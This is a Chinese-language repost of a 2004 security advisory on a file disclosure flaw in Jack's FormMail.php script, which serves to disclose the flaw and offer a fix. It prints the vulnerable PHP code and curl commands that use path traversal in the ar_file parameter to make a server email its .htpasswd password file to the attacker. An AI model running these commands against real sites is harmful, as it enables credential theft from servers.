 |
Jacks FormMail.php远程文件浏览漏洞 |
|
|
| Jacks FormMail.php远程文件浏览漏洞 |
|
| 作者:佚名 文章来源:不详 点击数: 更新时间:2007-1-25 10:39:59 |
|
安全通告:<1104534398.3963.60.camel@buskin.opriver.com>
漏洞主题:Jacks FormMail.php远程文件浏览漏洞
发布日期:2004.12.31日下午11:06
漏洞发布:Hack Hawk <hh hackhawk net>
厂商:Jack (Jack's Scripts)
日期:31-Dec-2004
脚本:FormMail.php
站点:http://dtheatre.com/scripts/formmail.php
方式:远程
等级:高
版本:5.0以及其他可能版本
脚本介绍:
Jacks FormMail.php脚本是个简单的PHp脚本使站点拥有者不需要太多的脚本知识就可以方便地给他们自己传送表单。
问题所在:
当前的脚本接受一个自动回复的变量(ar_file)来指定需要传送给提交表单的人文件的路径。但是问题存在于变量可以被提交表单的人定义并且用来获得服务器上的任何文件。
我发现该漏洞是因为一些人用这个漏洞来攻击我的客户。因为该脚本被广泛使用,于是我没有等Jack修补该脚本就立即向BUGTRAQ报告了该漏洞。
解决办法:
删掉FormMail.php脚本中的以下代码
------------------------------------------------------
if (file_exists($ar_file)) {
$fd = fopen($ar_file, "rb");
$ar_message = fread($fd, filesize($ar_file));
fclose($fd);
mail_it($ar_message, ($ar_subject)?stripslashes($ar_subject):"RE:
Form Submission", ($ar_from)?$ar_from:$recipient, $email);
}
------------------------------------------------------
攻击示例:
假设漏洞地址: http://yoursite.com/cgi-bin/formmail.php
密码文件地址: http://yoursite.com/members/.htpasswd
使用以下的curl命令来获得密码文件并且发送给你.
# curl -e http://yoursite.com/ -d ar_file=../members/.htpasswd -d
email=you yoursite com http://yoursite.com/cgi-bin/formmail.php
由于权限的设置,.htpasswd可能要修改一下,甚至他不在html目录下(如下面的例子)
# curl -e http://yoursite.com/ -d ar_file=../../.htpasswd -d
email=you yoursite com http://yoursite.com/cgi-bin/formmail.php【转自世纪安全网 http://www.21safe.com】
|
|
| 文章录入:admin 责任编辑:admin |
|
|
上一篇文章: vBulletin init.php sql注射漏洞
下一篇文章: PHP-Blogger Disclosure of Sensitive Information Security Issue |
|
|
| 【字体:小 大】【发表评论】【加入收藏】【告诉好友】【打印此文】【关闭窗口】 |
|
|
 网友评论:(只显示最新10条。评论内容只代表网友观点,与本站立场无关!) |
|
|
|
|
|
